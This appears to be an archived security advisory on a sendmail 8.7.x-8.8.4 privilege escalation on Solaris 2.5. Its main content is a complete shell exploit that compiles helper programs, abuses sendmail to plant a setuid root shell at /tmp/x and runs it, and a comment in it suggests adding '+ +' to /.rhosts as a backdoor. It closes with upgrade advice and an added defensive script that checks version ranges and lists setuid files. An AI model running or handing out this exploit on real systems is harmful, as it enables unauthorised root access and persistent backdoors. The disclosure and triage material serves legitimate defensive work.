COMMAND

    sendmail

SYSTEMS AFFECTED

    Solaris 2.5, 2.5.1

PROBLEM

    Remember Leshka's exploit for sendmail 8.7.x-8.8.2? If not, see
    vulnerability #10 of the sendmail group in the mUNIXes section.
    Here we have an exploit for Solaris by Spac3D0g, who claims that it
    works for sendmail 8.7.x-8.8.4. This exploit should create a suid
    program /tmp/x that calls a shell as root.

    #/bin/sh
    #
    # Modify  RUN in  x.c for  what you  wanna run,  and possibly  the
    # location or format of the ps command in the KILL line below  for
    # your platform.
    #
    # Or you could remove x.c alltogether and just put what you  wanna
    # do as root in smtpd.c (Ie: 'echo "+ +" >>/.rhosts' works nicely)
    #
    #
    cat << _EOF_ >/tmp/x.c
     #define RUN "/bin/ksh"
     #include <stdio.h>
     main()
     {
        execl(RUN,RUN,NULL);
     }
    _EOF_
    #
    cat << _EOF_ >/tmp/spawnfish.c
     main()
     {
       execl("/usr/lib/sendmail","/tmp/smtpd",0);
     }
    _EOF_
    #
    cat << _EOF_ >/tmp/smtpd.c
     main()
     {
       setuid(0); setgid(0);
       system("chown root /tmp/x ;chmod 4755 /tmp/x");
     }
    _EOF_
    #
    #
    gcc -O  -o /tmp/x /tmp/x.c
    gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
    gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
    #
    /tmp/spawnfish
    kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
    rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
    sleep 5
    if [ -u /tmp/x ] ; then
       echo "leet..."
       /tmp/x
    fi

SOLUTION

    Upgrade sendmail to 8.8.5 or a later version.
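
    The following triage script is an added example, not part of the
    original advisory or of sendmail. It checks a version string against
    the range named above and lists setuid files such as the /tmp/x the
    exploit leaves behind. The function names and sample versions are
    assumptions made for illustration.

```shell
#!/bin/sh
# Added example: defensive triage for the sendmail issue described above.

# Return 0 if VERSION is in the range this advisory names (8.7.x-8.8.4).
# The caller supplies the version string, e.g. read from the SMTP banner.
# A non-zero result only means "outside the range listed on this page".
sendmail_in_affected_range() {
    ver=$1
    old_ifs=$IFS; IFS=.
    set -- $ver
    IFS=$old_ifs
    major=${1:-0}; minor=${2:-0}; patch=${3:-0}
    # Drop vendor suffixes such as "4+Sun" -> "4".
    patch=${patch%%[!0-9]*}; patch=${patch:-0}
    case "$major.$minor" in
        8.7) return 0 ;;
        8.8) if [ "$patch" -le 4 ]; then return 0; fi
             return 1 ;;
        *)   return 1 ;;
    esac
}

# Print setuid regular files under DIR without crossing filesystems.
# The exploit above leaves one at /tmp/x, but any setuid file in a
# world-writable directory deserves review. Unreadable subdirectories
# are skipped silently.
suid_files_in() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null || :
}

# Constructed sample versions, not taken from any real host.
for v in 8.6.12 8.7.5 8.8.4 8.8.5; do
    if sendmail_in_affected_range "$v"; then
        echo "$v: in affected range, upgrade to 8.8.5 or later"
    else
        echo "$v: outside the range listed in this advisory"
    fi
done

echo "setuid files under /tmp:"
suid_files_in /tmp
```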